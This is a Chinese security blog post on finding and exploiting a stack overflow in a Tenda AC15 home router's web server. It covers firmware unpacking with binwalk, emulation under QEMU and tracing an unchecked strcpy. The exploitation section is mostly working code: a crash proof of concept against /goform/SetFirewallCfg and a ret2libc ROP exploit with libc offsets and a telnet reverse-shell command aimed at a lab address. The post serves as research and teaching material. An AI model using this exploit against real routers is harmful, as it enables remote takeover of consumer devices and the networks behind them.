<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  
  <title>某家用路由器固件漏洞挖掘利用 | f1r3K0&#39;s Blog | 欲买桂花同载酒</title>

  
  <meta name="author" content="K">
  

  
  <meta name="description" content="新年学点新东西，主要是栈溢出在IOT实战当中的利用。">
  

  
  
  <meta name="keywords" content="IOT">
  

  <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">

  <meta property="og:title" content="某家用路由器固件漏洞挖掘利用"/>

  <meta property="og:site_name" content="f1r3K0&#39;s Blog"/>

  
  <meta property="og:image" content="/icon.png"/>
  

  <link href="/icon.png" type="image/png" rel="icon">
  <link rel="alternate" href="/atom.xml" title="f1r3K0&#39;s Blog" type="application/atom+xml">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  
  <link href="https://fonts.lug.ustc.edu.cn/css?family=Lato|Rubik" rel="stylesheet">
  <script src="/js/pangu-407.min.js"></script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head>
<script>
  document.addEventListener('DOMContentLoaded', () => {
    pangu.autoSpacingPage();
  });
</script>
<script type="text/javascript" src="/js/search.js"></script>
<script type="text/javascript" src="/js/jquery.min.js"></script>


<body>
<div class="blog">
  <div class="content">
    <header>
  <div class="site-branding">
    <h1 class="site-title">
      <a href="/">f1r3K0&#39;s Blog</a>
    </h1>
    <p class="site-description">欲买桂花同载酒</p>
  </div>
  <nav class="site-navigation">
    <ul>
      
        <li><a href="/">主页</a></li>
      
        <li><a href="/archives">归档</a></li>
      
        <li><a href="/categories">分类</a></li>
      
        <li><a href="/about">关于</a></li>
      
    </ul>
  </nav>
</header>
    <main class="site-main posts-loop">
    <article>

  
    
    <h3 class="article-title"><span>某家用路由器固件漏洞挖掘利用</span></h3>
    
  

  <div class="article-top-meta">
    <span class="posted-on">
      <a href="/2025/02/11/某家用路由器固件漏洞挖掘利用/" rel="bookmark">
        <time class="entry-date published" datetime="2025-02-11T06:44:47.000Z">
          2025-02-11
        </time>
      </a>
    </span>
  </div>


  

  <div class="article-content">
    <div class="entry">
      
        

<script type="text/javascript">
    function convertRemToPixels(rem) {    
        return rem * parseFloat(getComputedStyle(document.documentElement).fontSize);
    }
    window.onscroll = function() {
        var scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
        if (scrollTop > convertRemToPixels(40)) {
            document.getElementsByClassName('toc-article')[0].style.visibility = 'visible';
        } else {
            document.getElementsByClassName('toc-article')[0].style.visibility = 'hidden';
        }
    }
</script>


<div id="toc" class="toc-article">
      <div class="toc-content">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E5%9B%BA%E4%BB%B6%E6%8F%90%E5%8F%96"><span class="toc-text">一、固件提取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E5%9B%BA%E4%BB%B6%E6%A8%A1%E6%8B%9F"><span class="toc-text">二、固件模拟</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98"><span class="toc-text">三、漏洞挖掘</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-text">四、漏洞利用</span></a></li></ol>
      </div>
</div>
<style>
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>



        <p>新年学点新东西，主要是栈溢出在IOT实战当中的利用。</p>
<span id="more"></span>

<h2 id="一、固件提取"><a href="#一、固件提取" class="headerlink" title="一、固件提取"></a>一、固件提取</h2><p>这里直接从Tenda官网下载的历史版本固件</p>
<p><a target="_blank" rel="noopener" href="https://www.tenda.com.cn/download">https://www.tenda.com.cn/download</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># binwalk直接解包</span></span><br><span class="line">binwalk -Me US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin</span><br></pre></td></tr></table></figure>

<p>还原出基本的文件系统结构</p>
<p><img src="/../img/image-20250211152630608.png" alt="image-20250211152630608"></p>
<p>webroot目录为前端资源，bin目录为主要后端功能以及系统shell命令</p>
<p><img src="/../img/image-20250211153352660.png" alt="image-20250211153352660"></p>
<p>Tenda路由器Web服务主要是用httpd服务启动的，因此我们首要分析httpd文件</p>
<p>固件基本信息：</p>
<p><img src="/../img/image-20250211154108657.png" alt="image-20250211154108657"></p>
<h2 id="二、固件模拟"><a href="#二、固件模拟" class="headerlink" title="二、固件模拟"></a>二、固件模拟</h2><p>使用qemu-arm-static直接运行程序发现无法进行启动Web服务</p>
<p><img src="/../img/image-20250212102111950.png" alt="image-20250212102111950"></p>
<p>拖入ida看下程序流发现有两步检测，过不了就会进入死循环</p>
<p><img src="/../img/image-20250212102459297.png" alt="image-20250212102459297"></p>
<p>简单patch一下</p>
<p><img src="/../img/image-20250212120608342.png" alt="image-20250212120608342"></p>
<p>启动发现监听地址为255.255.255.255</p>
<p><img src="/../img/image-20250212132510226.png" alt="image-20250212132510226"></p>
<p>简单跟了一下外部函数调用过程，在libChipApi.so中，get_eth_name函数存在网卡名称匹配传递参数操作</p>
<p><img src="/../img/image-20250212133102681.png" alt="image-20250212133102681"></p>
<p>因此我们新建一个网桥</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 创建网桥接口</span><br><span class="line">sudo ip link add name br0 type bridge</span><br><span class="line"></span><br><span class="line"># 将物理接口 eth0 加入网桥</span><br><span class="line">sudo ip link set eth0 master br0</span><br><span class="line"></span><br><span class="line"># 启动网桥接口</span><br><span class="line">sudo ip link set br0 up</span><br><span class="line"></span><br><span class="line"># 通过 DHCP 获取 IP</span><br><span class="line">sudo dhclient br0</span><br></pre></td></tr></table></figure>

<p>成功启动，模拟完成</p>
<p><img src="/../img/image-20250212133636289.png" alt="image-20250212133636289"></p>
<p><img src="/../img/image-20250212133740791.png" alt="image-20250212133740791"></p>
<h2 id="三、漏洞挖掘"><a href="#三、漏洞挖掘" class="headerlink" title="三、漏洞挖掘"></a>三、漏洞挖掘</h2><p>根据Tenda的历史漏洞来看，scanf的格式化字符串漏洞和strcpy、sprintf、strcat这类字符串拷贝导致栈溢出的漏洞比较多，这里发现之前的CVE漏洞修复痕迹</p>
<p><img src="/../img/image-20250212135736110.png" alt="image-20250212135736110"></p>
<p>全局搜索strcpy函数，发现这里一处未经长度限制的src直接拷贝给dest处开辟的栈空间</p>
<p><img src="/../img/image-20250212145715494.png" alt="image-20250212145715494"></p>
<p><img src="/../img/image-20250212145947855.png" alt="image-20250212145947855"></p>
<p>搜索字符串找到fromSetFirewallCfg调用，有SetFirewallCfg和GetFirewallCfg两个方法调用</p>
<p><img src="/../img/image-20250212151017966.png" alt="image-20250212151017966"></p>
<p>sub_171EC的引用比较复杂，搜索了下发现存在websFormHandler，根据函数名猜测为Web与路由器交互注册的Handler</p>
<p><img src="/../img/image-20250212151452488.png" alt="image-20250212151452488"></p>
<p>发现相关路由以及参数</p>
<p><img src="/../img/image-20250212152405462.png" alt="image-20250212152405462"></p>
<p>测试下缓冲区溢出导致的程序崩溃</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://192.168.106.145/goform/SetFirewallCfg&quot;</span></span><br><span class="line">header = &#123;</span><br><span class="line">    <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/x-www-form-urlencoded; charset=UTF-8&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Cookie&quot;</span>: <span class="string">&quot;password=emt1qw&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;A&quot;</span> * <span class="number">200</span></span><br><span class="line">data = &#123;<span class="string">&quot;firewallEn&quot;</span>: payload&#125;</span><br><span class="line">response = requests.post(url, headers=header, data=data, timeout=<span class="number">5</span>)</span><br><span class="line">response = requests.post(url, headers=header, data=data, timeout=<span class="number">5</span>)</span><br><span class="line"><span class="built_in">print</span>(response.text)</span><br></pre></td></tr></table></figure>

<p>如图栈溢出漏洞测试成功</p>
<p><img src="/../img/image-20250212153608766.png" alt="image-20250212153608766"></p>
<h2 id="四、漏洞利用"><a href="#四、漏洞利用" class="headerlink" title="四、漏洞利用"></a>四、漏洞利用</h2><p>这里考虑方便直接利用ret2libc获取system地址，然后就是正常做题思路</p>
<p>1.peda计算偏移</p>
<p>2.计算system在libc中的地址</p>
<p>3.利用ROPgadget寻找可以控制r0寄存器的gadget</p>
<p>4.寻找一条可以pop到r3的gadget</p>
<p>5.构造exp</p>
<p>最终payload(借鉴官方)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://192.168.106.139&quot;</span></span><br><span class="line">header = &#123;</span><br><span class="line">    <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/x-www-form-urlencoded; charset=UTF-8&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Cookie&quot;</span>: <span class="string">&quot;password=sds213&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 命令执行利用telnet反弹shell</span></span><br><span class="line">cmd = <span class="string">b&quot;echo test;telnet 192.168.106.145 4444 | /bin/sh | telnet 192.168.106.145 5555&quot;</span></span><br><span class="line"></span><br><span class="line">libc_base_addr = <span class="number">0xff58c000</span></span><br><span class="line">libc = ELF(<span class="string">&quot;./lib/libc.so.0&quot;</span>)</span><br><span class="line">system_offset = libc.symbols[<span class="string">&quot;system&quot;</span>]</span><br><span class="line"></span><br><span class="line">system_addr= libc_base_addr + system_offset</span><br><span class="line">r3_pop =libc_base_addr + <span class="number">0x00018298</span></span><br><span class="line">move_r0= libc_base_addr+ <span class="number">0x00040cb8</span></span><br><span class="line"></span><br><span class="line">payload = cyclic(<span class="number">52</span>) + p32(r3_pop) + p32(system_addr) + p32(move_r0) + cmd</span><br><span class="line"></span><br><span class="line">data = &#123;<span class="string">&quot;firewallEn&quot;</span>: payload&#125;</span><br><span class="line">response = requests.post(url + <span class="string">&quot;/goform/SetFirewallCfg&quot;</span>, headers=header, data=data)</span><br><span class="line"><span class="built_in">print</span>(response.text)</span><br></pre></td></tr></table></figure>

<p><img src="/../img/image-20250212175633962.png" alt="image-20250212175633962"></p>
<p>PWN！</p>

      
    </div>

  </div>

  <div class="article-footer">
    <div class="article-meta pull-left">

    
      

    <span class="post-categories">
      <i class="icon-categories"></i>
        <a href="/categories/RedTeam/">RedTeam</a>
    </span>
    

    
    

    <span class="post-tags">
      <i class="icon-tags"></i>
        <a href="/tags/IOT/">IOT</a>
    </span>
    

    </div>

    
  </div>
</article>

  



	<section id="comment" class="comment">
	  <div id="disqus_thread">
	  <noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
	  </div>
	</section>

	<script type="text/javascript">
	var disqus_shortname = 'kkkstart';
	(function(){
	  var dsq = document.createElement('script');
	  dsq.type = 'text/javascript';
	  dsq.async = true;
	  dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
	  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
	}());
	(function(){
	  var dsq = document.createElement('script');
	  dsq.type = 'text/javascript';
	  dsq.async = true;
	  dsq.src = '//' + disqus_shortname + '.disqus.com/count.js';
	  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
	}());
	</script>




    </main>
    <footer class="site-footer">
  <p class="site-info">
    </br>
    
    &copy; 2025 K
    
  </p>
</footer>
    
<script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
                (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

    ga('create', 'G-S3VKWWDN0Q', 'auto');
    ga('send', 'pageview');

</script>

    
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
          tex2jax: {
            inlineMath: [ ['$','$'], ["\\(","\\)"] ],
            processEscapes: true
          }
        });
      </script>
    
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
            tex2jax: {
              skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
            }
          });
      </script>
    
    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
              var all = MathJax.Hub.getAllJax(), i;
              for(i=0; i < all.length; i += 1) {
                  all[i].SourceElement().parentNode.className += ' has-jax';
              }
          });
      </script>
    
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
    </script>
    
  </div>
</div>
</body>
</html>